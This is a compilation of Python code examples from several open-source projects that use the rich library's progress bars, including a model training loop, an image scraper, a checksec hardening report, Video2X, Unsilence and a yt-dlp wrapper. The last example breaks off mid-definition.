        train_job = progress_bar.add_task('train', total=len_train_dl)
        for batch_num, batch in enumerate(train_dl):
            progress_bar._tasks[
                train_job].description = f"batch {batch_num}/{len_train_dl}"
            if debug_run and batch_num == debug_num_batches:
                break
            loss = loss_batch(model, loss_fn, batch)
            # mb.child.comment = f"loss {loss:0.4f}"
            loss.backward()
            opt.step()
            opt.zero_grad()
            progress_bar.update(train_job, advance=1)
        train_time = time.time() - start_time
        model.eval()
        len_val_dl = len(val_dl)
        val_job = progress_bar.add_task('validate...', total=len_val_dl)
        with torch.no_grad():
            valid_loss = []
            # for batch_num, batch in enumerate(progress_bar(val_dl, parent=mb)):
            for batch_num, batch in enumerate(val_dl):
                if debug_run and batch_num == debug_num_batches:
                    break
                valid_loss.append(loss_batch(model, loss_fn, batch).item())
            valid_loss = sum(valid_loss)
            progress_bar.update(val_job, advance=1)
        epoch_time = time.time() - start_time
        # mb.write([str(epoch + 1), f'{loss:0.4f}', f'{valid_loss / len(val_dl):0.4f}',
        #          format_time(epoch_time), format_time(train_time), format_time(epoch_time - train_time)], table=True)
        to_progress_bar = [
            f"{epoch + 1}", f"{loss:0.4f}", f"{valid_loss:0.4f}",
            f"{format_time(epoch_time)}", f"{format_time(train_time)}"
        ]  # , f"{format_time(val_time)}"]
        progress_bar.print(' '.join(
            [f"{value:>9}" for value in to_progress_bar]))
        progress_bar.update(main_job, advance=1)
        progress_bar.remove_task(train_job)
        progress_bar.remove_task(val_job)

    progress_bar.remove_task(main_job)
    progress_bar.stop()
コード例 #18
0
class WallHaven(object):
    def __init__(self) -> None:
        self.base_url = "https://wallhaven.cc/search?q=like%3Arddgwm&page="
        self.progress = Progress()

    async def get_list_image_page(self, session: ClientSession,
                                  url: str) -> None:
        """获取图片列表页"""
        try:
            async with session.get(url) as resp:
                if resp.status == 200:
                    html = await resp.text(encoding="utf8")
                    if html:
                        await self.parse_image_link(session, html)
                    return
                return
        except ClientResponseError:
            return

    async def parse_image_link(self, session: ClientSession,
                               html: str) -> None:
        """解析列表页小图链接"""
        element = etree.HTML(html)
        links = element.xpath('//img[@alt="loading"]/@data-src')
        for image_link in links:
            image_link = await self.image_link_process(image_link)
            await self.download_image(session, image_link)

    @staticmethod
    async def image_link_process(image_link: str) -> str:
        """转换图片链接"""
        if "small" in image_link:
            image_link = image_link.replace("th", "w")
            image_link = image_link.replace("small", "full")
            url_path = image_link.split("/")
            url_path[-1] = f"wallhaven-{url_path[-1]}"
            image_link = "/".join(url_path)
            return image_link

    async def download_image(self, session: ClientSession,
                             image_link: str) -> None:
        """下载图片"""
        async with session.get(image_link) as resp:
            try:
                # 获取图片字节总长度
                file_size = int(resp.headers['content-length'])
                if resp.status == 200:
                    file_name = image_link.split("/")[-1]
                    async with aiofiles.open(file=f"images/{file_name}",
                                             mode="ab") as f:
                        self.progress.start()
                        task = self.progress.add_task(
                            f'[red]Downloading...{file_name}', total=file_size)
                        while True:
                            chunk = await resp.content.read(1024)
                            if not chunk:
                                break
                            await f.write(chunk)
                            self.progress.update(task, advance=1024)
                        self.progress.stop()
            except Exception:
                return

    async def run(self):
        headers = {
            "User-Agent":
            "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36"
        }
        # 限制最大连接数
        async with aiohttp.TCPConnector(
            limit=200,
            force_close=True,
            enable_cleanup_closed=True,
        ) as tc:
            # 创建session对象
            async with ClientSession(connector=tc, headers=headers) as session:
                urls = [f"{self.base_url}{i}" for i in range(1, 9)]
                # 创建任务
                tasks = [
                    asyncio.ensure_future(
                        self.get_list_image_page(session, url)) for url in urls
                ]
                # 等待任务完成
                await asyncio.gather(*tasks)
コード例 #19
0
class RichOutput(AbstractChecksecOutput):
    def __init__(self, libc_detected: bool = False):
        """Init Rich Console and Table"""
        super().__init__(libc_detected)
        # init ELF table
        self.table_elf = Table(title="Checksec Results: ELF", expand=True)
        self.table_elf.add_column("File", justify="left", header_style="")
        self.table_elf.add_column("NX", justify="center")
        self.table_elf.add_column("PIE", justify="center")
        self.table_elf.add_column("Canary", justify="center")
        self.table_elf.add_column("Relro", justify="center")
        self.table_elf.add_column("RPATH", justify="center")
        self.table_elf.add_column("RUNPATH", justify="center")
        self.table_elf.add_column("Symbols", justify="center")
        if self._libc_detected:
            self.table_elf.add_column("FORTIFY", justify="center")
            self.table_elf.add_column("Fortified", justify="center")
            self.table_elf.add_column("Fortifiable", justify="center")
            self.table_elf.add_column("Fortify Score", justify="center")

        # init PE table
        self.table_pe = Table(title="Checksec Results: PE", expand=True)
        self.table_pe.add_column("File", justify="left", header_style="")
        self.table_pe.add_column("NX", justify="center")
        self.table_pe.add_column("Canary", justify="center")
        self.table_pe.add_column("ASLR", justify="center")
        self.table_pe.add_column("Dynamic Base", justify="center")
        self.table_pe.add_column("High Entropy VA", justify="center")
        self.table_pe.add_column("SEH", justify="center")
        self.table_pe.add_column("SafeSEH", justify="center")
        self.table_pe.add_column("Force Integrity", justify="center")
        self.table_pe.add_column("Control Flow Guard", justify="center")
        self.table_pe.add_column("Isolation", justify="center")
        self.table_pe.add_column("Authenticode", justify="center")

        # init console
        self.console = Console()

        # build progress bar
        self.process_bar = Progress(
            TextColumn("[bold blue]Processing...", justify="left"),
            BarColumn(bar_width=None),
            "{task.completed}/{task.total}",
            "•",
            "[progress.percentage]{task.percentage:>3.1f}%",
            console=self.console,
        )
        self.display_res_bar = Progress(
            BarColumn(bar_width=None),
            TextColumn("[bold blue]{task.description}", justify="center"),
            BarColumn(bar_width=None),
            console=self.console,
            transient=True,
        )
        self.enumerate_bar = Progress(
            TextColumn("[bold blue]Enumerating...", justify="center"),
            BarColumn(bar_width=None),
            console=self.console,
            transient=True,
        )

        self.process_task_id = None

    def __exit__(self, exc_type, exc_val, exc_tb):
        # cleanup the Rich progress bars
        if self.enumerate_bar is not None:
            self.enumerate_bar.stop()
        if self.process_bar is not None:
            self.process_bar.stop()
        if self.display_res_bar is not None:
            self.display_res_bar.stop()

    def enumerating_tasks_start(self):
        # start progress bar
        self.enumerate_bar.start()
        self.enumerate_bar.add_task("Enumerating", start=False)

    def enumerating_tasks_stop(self, total: int):
        super().enumerating_tasks_stop(total)
        self.enumerate_bar.stop()
        self.enumerate_bar = None

    def processing_tasks_start(self):
        # init progress bar
        self.process_bar.start()
        self.process_task_id = self.process_bar.add_task("Checking",
                                                         total=self.total)

    def add_checksec_result(self, filepath: Path,
                            checksec: Union[ELFChecksecData, PEChecksecData]):
        logging.debug("result for %s: %s", filepath, checksec)
        if isinstance(checksec, ELFChecksecData):
            row_res: List[str] = []
            # display results
            if not checksec.nx:
                nx_res = "[red]No"
            else:
                nx_res = "[green]Yes"
            row_res.append(nx_res)

            pie = checksec.pie
            if pie == PIEType.No:
                pie_res = f"[red]{pie.name}"
            elif pie == PIEType.DSO:
                pie_res = f"[yellow]{pie.name}"
            else:
                pie_res = "[green]Yes"
            row_res.append(pie_res)

            if not checksec.canary:
                canary_res = "[red]No"
            else:
                canary_res = "[green]Yes"
            row_res.append(canary_res)

            relro = checksec.relro
            if relro == RelroType.No:
                relro_res = f"[red]{relro.name}"
            elif relro == RelroType.Partial:
                relro_res = f"[yellow]{relro.name}"
            else:
                relro_res = f"[green]{relro.name}"
            row_res.append(relro_res)

            if checksec.rpath:
                rpath_res = "[red]Yes"
            else:
                rpath_res = "[green]No"
            row_res.append(rpath_res)

            if checksec.runpath:
                runpath_res = "[red]Yes"
            else:
                runpath_res = "[green]No"
            row_res.append(runpath_res)

            if checksec.symbols:
                symbols_res = "[red]Yes"
            else:
                symbols_res = "[green]No"
            row_res.append(symbols_res)

            # fortify results depend on having a Libc available
            if self._libc_detected:
                fortified_count = checksec.fortified
                if checksec.fortify_source:
                    fortify_source_res = "[green]Yes"
                else:
                    fortify_source_res = "[red]No"
                row_res.append(fortify_source_res)

                if fortified_count == 0:
                    fortified_res = "[red]No"
                else:
                    fortified_res = f"[green]{fortified_count}"
                row_res.append(fortified_res)

                fortifiable_count = checksec.fortifiable
                if fortified_count == 0:
                    fortifiable_res = "[red]No"
                else:
                    fortifiable_res = f"[green]{fortifiable_count}"
                row_res.append(fortifiable_res)

                if checksec.fortify_score == 0:
                    fortified_score_res = f"[red]{checksec.fortify_score}"
                elif checksec.fortify_score == 100:
                    fortified_score_res = f"[green]{checksec.fortify_score}"
                else:
                    fortified_score_res = f"[yellow]{checksec.fortify_score}"
                row_res.append(fortified_score_res)

            self.table_elf.add_row(str(filepath), *row_res)
        elif isinstance(checksec, PEChecksecData):
            if not checksec.nx:
                nx_res = "[red]No"
            else:
                nx_res = "[green]Yes"

            if not checksec.canary:
                canary_res = "[red]No"
            else:
                canary_res = "[green]Yes"

            if not checksec.aslr:
                aslr_res = "[red]No"
            else:
                aslr_res = "[green]Yes"

            if not checksec.dynamic_base:
                dynamic_base_res = "[red]No"
            else:
                dynamic_base_res = "[green]Yes"

            # this is only relevant is binary is 64 bits
            if checksec.machine == MACHINE_TYPES.AMD64:
                if not checksec.high_entropy_va:
                    entropy_va_res = "[red]No"
                else:
                    entropy_va_res = "[green]Yes"
            else:
                entropy_va_res = "/"

            if not checksec.seh:
                seh_res = "[red]No"
            else:
                seh_res = "[green]Yes"

            # only relevant if 32 bits
            if checksec.machine == MACHINE_TYPES.I386:
                if not checksec.safe_seh:
                    safe_seh_res = "[red]No"
                else:
                    safe_seh_res = "[green]Yes"
            else:
                safe_seh_res = "/"

            if not checksec.authenticode:
                auth_res = "[red]No"
            else:
                auth_res = "[green]Yes"

            if not checksec.force_integrity:
                force_integrity_res = "[red]No"
            else:
                force_integrity_res = "[green]Yes"

            if not checksec.guard_cf:
                guard_cf_res = "[red]No"
            else:
                guard_cf_res = "[green]Yes"

            if not checksec.isolation:
                isolation_res = "[red]No"
            else:
                isolation_res = "[green]Yes"

            self.table_pe.add_row(
                str(filepath),
                nx_res,
                canary_res,
                aslr_res,
                dynamic_base_res,
                entropy_va_res,
                seh_res,
                safe_seh_res,
                force_integrity_res,
                guard_cf_res,
                isolation_res,
                auth_res,
            )
        else:
            raise NotImplementedError

    def checksec_result_end(self):
        """Update progress bar"""
        self.process_bar.update(self.process_task_id, advance=1)

    def print(self):
        self.process_bar.stop()
        self.process_bar = None

        if self.table_elf.row_count > 0:
            with self.display_res_bar:
                task_id = self.display_res_bar.add_task(
                    "Displaying Results: ELF ...", start=False)
                self.console.print(self.table_elf)
                self.display_res_bar.remove_task(task_id)
        if self.table_pe.row_count > 0:
            with self.display_res_bar:
                task_id = self.display_res_bar.add_task(
                    "Displaying Results: PE ...", start=False)
                self.console.print(self.table_pe)
                self.display_res_bar.remove_task(task_id)

        self.display_res_bar.stop()
        self.display_res_bar = None
コード例 #20
0
class Video2X:
    """
    Video2X class

    provides two vital functions:
        - upscale: perform upscaling on a file
        - interpolate: perform motion interpolation on a file
    """

    def __init__(self) -> None:
        self.version = __version__

    def _get_video_info(self, path: pathlib.Path) -> tuple:
        """
        get video file information with FFmpeg

        :param path pathlib.Path: video file path
        :raises RuntimeError: raised when video stream isn't found
        """
        # probe video file info
        logger.info("Reading input video information")
        for stream in ffmpeg.probe(path)["streams"]:
            if stream["codec_type"] == "video":
                video_info = stream
                break
        else:
            raise RuntimeError("unable to find video stream")

        # get total number of frames to be processed
        capture = cv2.VideoCapture(str(path))

        # check if file is opened successfully
        if not capture.isOpened():
            raise RuntimeError("OpenCV has failed to open the input file")

        total_frames = int(capture.get(cv2.CAP_PROP_FRAME_COUNT))
        frame_rate = capture.get(cv2.CAP_PROP_FPS)

        return video_info["width"], video_info["height"], total_frames, frame_rate

    def _toggle_pause(self, _signal_number: int = -1, _frame=None):
        # print console messages and update the progress bar's status
        if self.pause.value is False:
            self.progress.update(self.task, description=self.description + " (paused)")
            self.progress.stop_task(self.task)
            logger.warning("Processing paused, press Ctrl+Alt+V again to resume")

        elif self.pause.value is True:
            self.progress.update(self.task, description=self.description)
            logger.warning("Resuming processing")
            self.progress.start_task(self.task)

        # invert the value of the pause flag
        with self.pause.get_lock():
            self.pause.value = not self.pause.value

    def _run(
        self,
        input_path: pathlib.Path,
        width: int,
        height: int,
        total_frames: int,
        frame_rate: float,
        output_path: pathlib.Path,
        output_width: int,
        output_height: int,
        Processor: object,
        mode: str,
        processes: int,
        processing_settings: tuple,
    ) -> None:

        # record original STDOUT and STDERR for restoration
        original_stdout = sys.stdout
        original_stderr = sys.stderr

        # create console for rich's Live display
        console = Console()

        # redirect STDOUT and STDERR to console
        sys.stdout = FileProxy(console, sys.stdout)
        sys.stderr = FileProxy(console, sys.stderr)

        # re-add Loguru to point to the new STDERR
        logger.remove()
        logger.add(sys.stderr, colorize=True, format=LOGURU_FORMAT)

        # initialize values
        self.processor_processes = []
        self.processing_queue = multiprocessing.Queue(maxsize=processes * 10)
        processed_frames = multiprocessing.Manager().list([None] * total_frames)
        self.processed = multiprocessing.Value("I", 0)
        self.pause = multiprocessing.Value(ctypes.c_bool, False)

        # set up and start decoder thread
        logger.info("Starting video decoder")
        self.decoder = VideoDecoder(
            input_path,
            width,
            height,
            frame_rate,
            self.processing_queue,
            processing_settings,
            self.pause,
        )
        self.decoder.start()

        # set up and start encoder thread
        logger.info("Starting video encoder")
        self.encoder = VideoEncoder(
            input_path,
            frame_rate * 2 if mode == "interpolate" else frame_rate,
            output_path,
            output_width,
            output_height,
            total_frames,
            processed_frames,
            self.processed,
            self.pause,
        )
        self.encoder.start()

        # create processor processes
        for process_name in range(processes):
            process = Processor(self.processing_queue, processed_frames, self.pause)
            process.name = str(process_name)
            process.daemon = True
            process.start()
            self.processor_processes.append(process)

        # create progress bar
        self.progress = Progress(
            "[progress.description]{task.description}",
            BarColumn(complete_style="blue", finished_style="green"),
            "[progress.percentage]{task.percentage:>3.0f}%",
            "[color(240)]({task.completed}/{task.total})",
            ProcessingSpeedColumn(),
            TimeElapsedColumn(),
            "<",
            TimeRemainingColumn(),
            console=console,
            speed_estimate_period=300.0,
            disable=True,
        )

        self.description = f"[cyan]{MODE_LABELS.get(mode, 'Unknown')}"
        self.task = self.progress.add_task(self.description, total=total_frames)

        # allow sending SIGUSR1 to pause/resume processing
        signal.signal(signal.SIGUSR1, self._toggle_pause)

        # enable global pause hotkey if it's supported
        if ENABLE_HOTKEY is True:

            # create global pause hotkey
            pause_hotkey = pynput.keyboard.HotKey(
                pynput.keyboard.HotKey.parse("<ctrl>+<alt>+v"), self._toggle_pause
            )

            # create global keyboard input listener
            keyboard_listener = pynput.keyboard.Listener(
                on_press=(
                    lambda key: pause_hotkey.press(keyboard_listener.canonical(key))
                ),
                on_release=(
                    lambda key: pause_hotkey.release(keyboard_listener.canonical(key))
                ),
            )

            # start monitoring global key presses
            keyboard_listener.start()

        # a temporary variable that stores the exception
        exception = []

        try:

            # wait for jobs in queue to deplete
            while self.processed.value < total_frames - 1:
                time.sleep(1)

                # check processor health
                for process in self.processor_processes:
                    if not process.is_alive():
                        raise Exception("process died unexpectedly")

                # check decoder health
                if not self.decoder.is_alive() and self.decoder.exception is not None:
                    raise Exception("decoder died unexpectedly")

                # check encoder health
                if not self.encoder.is_alive() and self.encoder.exception is not None:
                    raise Exception("encoder died unexpectedly")

                # show progress bar when upscale starts
                if self.progress.disable is True and self.processed.value > 0:
                    self.progress.disable = False
                    self.progress.start()

                # update progress
                if self.pause.value is False:
                    self.progress.update(self.task, completed=self.processed.value)

            self.progress.update(self.task, completed=total_frames)
            self.progress.stop()
            logger.info("Processing has completed")

        # if SIGTERM is received or ^C is pressed
        # TODO: pause and continue here
        except (SystemExit, KeyboardInterrupt) as e:
            self.progress.stop()
            logger.warning("Exit signal received, exiting gracefully")
            logger.warning("Press ^C again to force terminate")
            exception.append(e)

        except Exception as e:
            self.progress.stop()
            logger.exception(e)
            exception.append(e)

        finally:

            # stop keyboard listener
            if ENABLE_HOTKEY is True:
                keyboard_listener.stop()
                keyboard_listener.join()

            # stop progress display
            self.progress.stop()

            # stop processor processes
            logger.info("Stopping processor processes")
            for process in self.processor_processes:
                process.terminate()

            # wait for processes to finish
            for process in self.processor_processes:
                process.join()

            # stop encoder and decoder
            logger.info("Stopping decoder and encoder threads")
            self.decoder.stop()
            self.encoder.stop()
            self.decoder.join()
            self.encoder.join()

            # mark processing queue as closed
            self.processing_queue.close()

            # raise the error if there is any
            if len(exception) > 0:
                raise exception[0]

            # restore original STDOUT and STDERR
            sys.stdout = original_stdout
            sys.stderr = original_stderr

            # re-add Loguru to point to the restored STDERR
            logger.remove()
            logger.add(sys.stderr, colorize=True, format=LOGURU_FORMAT)

    def upscale(
        self,
        input_path: pathlib.Path,
        output_path: pathlib.Path,
        output_width: int,
        output_height: int,
        noise: int,
        processes: int,
        threshold: float,
        algorithm: str,
    ) -> None:

        # get basic video information
        width, height, total_frames, frame_rate = self._get_video_info(input_path)

        # automatically calculate output width and height if only one is given
        if output_width == 0 or output_width is None:
            output_width = output_height / height * width

        elif output_height == 0 or output_height is None:
            output_height = output_width / width * height

        # sanitize output width and height to be divisible by 2
        output_width = int(math.ceil(output_width / 2.0) * 2)
        output_height = int(math.ceil(output_height / 2.0) * 2)

        # start processing
        self._run(
            input_path,
            width,
            height,
            total_frames,
            frame_rate,
            output_path,
            output_width,
            output_height,
            Upscaler,
            "upscale",
            processes,
            (
                output_width,
                output_height,
                noise,
                threshold,
                algorithm,
            ),
        )

    def interpolate(
        self,
        input_path: pathlib.Path,
        output_path: pathlib.Path,
        processes: int,
        threshold: float,
        algorithm: str,
    ) -> None:

        # get video basic information
        width, height, original_frames, frame_rate = self._get_video_info(input_path)

        # calculate the number of total output frames
        total_frames = original_frames * 2 - 1

        # start processing
        self._run(
            input_path,
            width,
            height,
            total_frames,
            frame_rate,
            output_path,
            width,
            height,
            Interpolator,
            "interpolate",
            processes,
            (threshold, algorithm),
        )
コード例 #21
0
def run():
    """
    Run the Console Interface for Unsilence
    :return: None
    """
    sys.tracebacklimit = 0

    args = parse_arguments()
    console = Console()

    if args.debug:
        sys.tracebacklimit = 1000

    if args.output_file.exists() and not args.non_interactive_mode:
        if not choice_dialog(
                console, "File already exists. Overwrite?", default=False):
            return

    args_dict = vars(args)

    argument_list_for_silence_detect = [
        "silence_level", "silence_time_threshold", "short_interval_threshold",
        "stretch_time"
    ]

    argument_dict_for_silence_detect = {
        key: args_dict[key]
        for key in argument_list_for_silence_detect if key in args_dict.keys()
    }

    argument_list_for_renderer = [
        "audio_only", "audible_speed", "silent_speed", "audible_volume",
        "silent_volume", "drop_corrupted_intervals", "threads"
    ]

    argument_dict_for_renderer = {
        key: args_dict[key]
        for key in argument_list_for_renderer if key in args_dict.keys()
    }

    progress = Progress()

    continual = Unsilence(args.input_file)

    with progress:

        def update_task(current_task):
            def handler(current_val, total):
                progress.update(current_task,
                                total=total,
                                completed=current_val)

            return handler

        silence_detect_task = progress.add_task("Calculating Intervals...",
                                                total=1)

        continual.detect_silence(
            on_silence_detect_progress_update=update_task(silence_detect_task),
            **argument_dict_for_silence_detect)

        progress.stop()
        progress.remove_task(silence_detect_task)

        print()

        estimated_time = continual.estimate_time(args.audible_speed,
                                                 args.silent_speed)
        console.print(pretty_time_estimate(estimated_time))

        print()

        if not args.non_interactive_mode:
            if not choice_dialog(
                    console, "Continue with these options?", default=True):
                return

        progress.start()
        rendering_task = progress.add_task("Rendering Intervals...", total=1)
        concat_task = progress.add_task("Combining Intervals...", total=1)

        continual.render_media(
            args.output_file,
            on_render_progress_update=update_task(rendering_task),
            on_concat_progress_update=update_task(concat_task),
            **argument_dict_for_renderer)

        progress.stop()

    console.print("\n[green]Finished![/green] :tada:")
    print()
コード例 #22
0
class TimeLoop:
    """
    A special iterator that will iterate for a specified duration of time.

    Uses a progress meter to show the user how much time is left.
    Each iteration of the time-loop produces a tick.
    """

    advent: Optional[pendulum.DateTime]
    moment: Optional[pendulum.DateTime]
    last_moment: Optional[pendulum.DateTime]
    counter: int
    progress: Optional[Progress]
    duration: pendulum.Duration
    message: str
    color: str

    def __init__(
        self,
        duration: Union[pendulum.Duration, int],
        message: str = "Processing",
        color: str = "green",
    ):
        """
        Initialize the time-loop.

        Duration may be either a count of seconds or a ``pendulum.duration``.
        """
        self.moment = None
        self.last_moment = None
        self.counter = 0
        self.progress = None
        if isinstance(duration, int):
            JobbergateCliError.require_condition(
                duration > 0, "The duration must be a positive integer")
            self.duration = pendulum.duration(seconds=duration)
        else:
            self.duration = duration
        self.message = message
        self.color = color

    def __del__(self):
        """
        Explicitly clear the progress meter if the time-loop is destroyed.
        """
        self.clear()

    def __iter__(self) -> "TimeLoop":
        """
        Start the iterator.

        Creates and starts the progress meter
        """
        self.advent = self.last_moment = self.moment = pendulum.now()
        self.counter = 0
        self.progress = Progress()
        self.progress.add_task(
            f"[{self.color}]{self.message}...",
            total=self.duration.total_seconds(),
        )
        self.progress.start()
        return self

    def __next__(self) -> Tick:
        """
        Iterates the time loop and returns a tick.

        If the duration is complete, clear the progress meter and stop iteration.
        """
        # Keep mypy happy
        assert self.progress is not None

        self.counter += 1
        self.last_moment = self.moment
        self.moment: pendulum.DateTime = pendulum.now()
        elapsed: pendulum.Duration = self.moment - self.last_moment
        total_elapsed: pendulum.Duration = self.moment - self.advent

        for task_id in self.progress.task_ids:
            self.progress.advance(task_id, elapsed.total_seconds())

        if self.progress.finished:
            self.clear()
            raise StopIteration

        return Tick(
            counter=self.counter,
            elapsed=elapsed,
            total_elapsed=total_elapsed,
        )

    def clear(self):
        """
        Clear the time-loop.

        Stops the progress meter (if it is set) and reset moments, counter, progress meter.
        """
        if self.progress is not None:
            self.progress.stop()
        self.counter = 0
        self.progress = None
        self.moment = None
        self.last_moment = None
コード例 #23
0
    def train(self, trainData, trainLabel):
        '''
        训练
        ===
        Arguments
        ---------
        - `trainData` 训练集数据
        - `trainLabel` 训练集标签

        Algorithm
        ---------
        - Sequential minimal optimization, SMO

        Returns
        -------
        '''
        self.__x, self.__y = np.array(trainData), np.array(trainLabel)
        self.__alpha = np.zeros(self.__x.shape[0])
        self.__b = 0
        self.__K = np.zeros([self.__x.shape[0], self.__x.shape[0]],
                            dtype=float)  # 训练数据核函数表

        for i in range(self.__x.shape[0]):
            for j in range(i, self.__x.shape[0]):
                self.__K[i, j] = self.__K[j, i] = self.Kernel(
                    self.__x[i], self.__x[j])  # 计算核函数表

        progress = Progress(
            "[progress.description]{task.description}",
            BarColumn(bar_width=None),
            "[progress.percentage]{task.completed}/{task.total}",
            "•",
            "[time]{task.elapsed:.2f}s",
        )  # rich 进度条
        progress.start()

        allSatisfied = False  # 全部满足 KKT 条件
        iteration = 1  # 迭代次数
        while not allSatisfied:
            allSatisfied = True
            iterateTask = progress.add_task(
                "[yellow]{} iterating...".format(iteration),
                total=self.__x.shape[0])
            iteration += 1
            for i in range(self.__x.shape[0]):  # 外层循环
                progress.update(iterateTask, advance=1)
                if not (self.__ifSatisfyKKT(i)):  # 选择第一个变量
                    E1 = self.__Error(i)
                    maximum = -1
                    for k in range(self.__x.shape[0]):  # 内层循环
                        tempE = self.__Error(k)
                        tempE_difference = np.fabs(E1 - self.__Error(k))
                        if tempE_difference > maximum:  # 选择第二个变量
                            maximum = tempE_difference
                            E2 = tempE
                            j = k
                    if maximum == -1:
                        continue

                    U = max(0, (self.__alpha[i] + self.__alpha[j] -
                                self.__C) if self.__y[i] == self.__y[j] else
                            (self.__alpha[j] -
                             self.__alpha[i]))  # alpha^2_new 的下界
                    V = min(
                        self.__C,
                        (self.__alpha[i] +
                         self.__alpha[j]) if self.__y[i] == self.__y[j] else
                        (self.__alpha[j] - self.__alpha[i] +
                         self.__C))  # alpha^new_2 的上界
                    alpha_2_new = self.__alpha[j] + self.__y[j] * (E1 - E2) / (
                        self.__K[i, i] + self.__K[j, j] - 2 * self.__K[i, j])

                    # alpha^2_new 越界
                    if alpha_2_new > V:
                        alpha_2_new = V
                    elif alpha_2_new < U:
                        alpha_2_new = U

                    alpha_1_new = self.__alpha[i] + self.__y[i] * \
                        self.__y[j] * (self.__alpha[j] - alpha_2_new)

                    # 更新偏置
                    b_1_new = -E1 - self.__y[i] * self.__K[i, i] * (
                        alpha_1_new -
                        self.__alpha[i]) - self.__y[j] * self.__K[j, i] * (
                            alpha_2_new - self.__alpha[j]) + self.__b
                    b_2_new = -E2 - self.__y[i] * self.__K[i, j] * (
                        alpha_1_new -
                        self.__alpha[i]) - self.__y[j] * self.__K[j, j] * (
                            alpha_2_new - self.__alpha[j]) + self.__b

                    # 实装更新
                    if (np.fabs(self.__alpha[i] - alpha_1_new) <
                            0.0000001) and (np.fabs(self.__alpha[j] -
                                                    alpha_2_new) < 0.0000001):
                        continue
                    else:
                        allSatisfied = False

                    self.__alpha[i] = alpha_1_new
                    self.__alpha[j] = alpha_2_new

                    if 0 < alpha_1_new < self.__C:
                        self.__b = b_1_new
                    elif 0 < alpha_2_new < self.__C:
                        self.__b = b_2_new
                    else:
                        self.__b = (b_1_new + b_2_new) / 2

            progress.stop_task(iterateTask)

        progress.stop()

        return
コード例 #24
0
ファイル: yt_dlp_api.py プロジェクト: kkatayama/plexarr
class YouTubeDLP(object):
    """Wrapper for YouTubeDLP via yt_dlp"""
    def __init__(self):
        """Init Constructor

        From config:
            cookies (str): Path to Cookies File
        """
        config = ConfigParser()
        # config.read(os.path.join(os.path.expanduser('~'), '.config', 'plexarr.ini'))
        config.read(Path.home().joinpath(".config", "plexarr.ini"))

        self.path = config['youtube'].get('path')
        self.temp_dir = config['youtube'].get('temp_dir')
        self.cookies = config['youtube'].get('cookies')
        self.headers = None
        self.progress = Progress()
        self.task = None
        self.downloaded_bytes = 0
        self.download_status = False

    def d_hook(self, d):
        """
        SEE: https://stackoverflow.com/a/58667850/3370913

        THIS IS POLLED WHILE DOWNLOADING...
        """
        # print(d)
        if d['status'] == 'finished':
            self.download_status = False
            self.progress.stop()
            file_tuple = os.path.split(os.path.abspath(d['filename']))
            print(f'Done downloading "{file_tuple[1]}"')

        if d['status'] == 'downloading':
            if not self.download_status:
                if d.get('total_bytes'):
                    total = d["total_bytes"]
                elif d.get("total_bytes_estimate"):
                    total = d["total_bytes_estimate"]
                else:
                    total = 1
                file_tuple = os.path.split(os.path.abspath(d["filename"]))
                self.download_status = True
                self.task = self.progress.add_task(
                    f'[cyan]Downloading[/]: [yellow]"{file_tuple[1]}"[/]',
                    total=total)
                self.progress.start()

            step = int(d["downloaded_bytes"]) - int(self.downloaded_bytes)
            self.downloaded_bytes = int(d["downloaded_bytes"])
            self.progress.update(self.task, advance=step)
            # print(d['filename'], d['_percent_str'], d['_eta_str'])

    def getInfo(self, video_url='', **kwargs):
        """Info JSON"""
        self.video_url = video_url
        self.quiet = True
        self.verbose = False
        self.outtmpl = None
        self.writethumbnail = False
        self.writeinfojson = False
        self.__dict__.update(kwargs)

        if not self.video_url:
            print('[red]YOU NEED TO SET: video_url[/]')
            return

        ytdl_opts = {
            'quiet': self.quiet,
            'verbose': self.verbose,
            'overwrites': None,
            'writethumbnail': self.writethumbnail,
            'writeinfojson': self.writeinfojson,
            'noplaylist': True,
            'skip_download': True,
            'clean_infojson': False,
            'outtmpl': self.outtmpl,
            'ignoreerrors': False,
            'cookiefile': self.cookies,
            'format':
            "bestvideo[ext=mp4]+bestaudio[ext=m4a]/best[ext=mp4]/best",
            'logger': MyLogger(),
            'progress_hooks': [self.d_hook]
        }

        with yt_dlp.YoutubeDL(ytdl_opts) as ytdl:
            ytdl.add_post_processor(FinishedPP())
            data = ytdl.extract_info(self.video_url)
            info = ytdl.sanitize_info(data)
            self.data = data
            self.info = info
            return info

    def searchInfo(self, media, video, audio, query, **kwargs):
        """Search for Matching Video by MetaData"""
        self.__dict__.update(kwargs)
        vsize = video["stream_size"]
        asize = audio["stream_size"]
        width = video["width"]
        height = video["height"]
        vcodec = video["codec_id"].split("-")[0]
        acodec = audio["codec_id"].split("-")[0]

        fps = round(float(video["frame_rate"]))
        ext = media["file_extension"]
        asr = audio["sampling_rate"]

        video_format = f'bestvideo[height={height}][width={width}][ext={ext}][fps={fps}][vcodec*={vcodec}][filesize>={vsize}]'
        audio_format = f'bestaudio[acodec*={acodec}][asr={asr}][filesize>={asize}]'

        ytdl_opts = {
            'noplaylist': True,
            'ignoreerrors': True,
            'cookiefile': self.cookies,
            'default_search': 'ytsearch4',
            'skip_download': True,
            'format': f'{video_format}+{audio_format}',
            'logger': MyLogger(),
            'progress_hooks': [self.d_hook]
        }

        with yt_dlp.YoutubeDL(ytdl_opts) as ytdl:
            ytdl.add_post_processor(FinishedPP())
            msize = media["file_size"]
            results = ytdl.extract_info(query, download=False)
            self.search_results = results
            matches = [
                r for r in results["entries"] if ((r is not None) and (
                    abs(msize - r["filesize_approx"]) < 1000000))
            ]
            print(
                f'results: {len(results["entries"])}, matches: {len(matches)}')
            return matches

    def downloadVideo(self, title='', video_url='', path='', **kwargs):
        """Downlod youtube video into folder

        Args:
            title (str):     (Required) - the video title
            video_url (str): (Required) - the link of the youtube video
            path (str):      (Required) - the output directory!

        example:
            from plexarr import youtubedlp

            youtube = youtubedlp()
            youtube.downloadvideo(title=title, video_url=url, path=lib_path)

        """
        # -- setting up path configs
        self.title = title
        self.video_url = video_url
        self.path = path
        self.headers = False
        self.writethumbnail = False
        self.writeinfojson = False
        self.writesubtitles = True
        self.writeautomaticsub = False
        self.__dict__.update(kwargs)

        self.title = title
        self.path = path
        self.folder = os.path.join(self.path, self.title)
        self.f_name = os.path.join(self.path, self.title, f'{self.title}.mp4')

        # -- create fresh directory
        print(f'creating directory: "{self.folder}"')
        print(f'{{"video_url": {video_url}}}')
        os.makedirs(self.folder, exist_ok=True)

        ### Download Movie via yt-dlp ###
        ytdl_opts = {
            'writethumbnail':
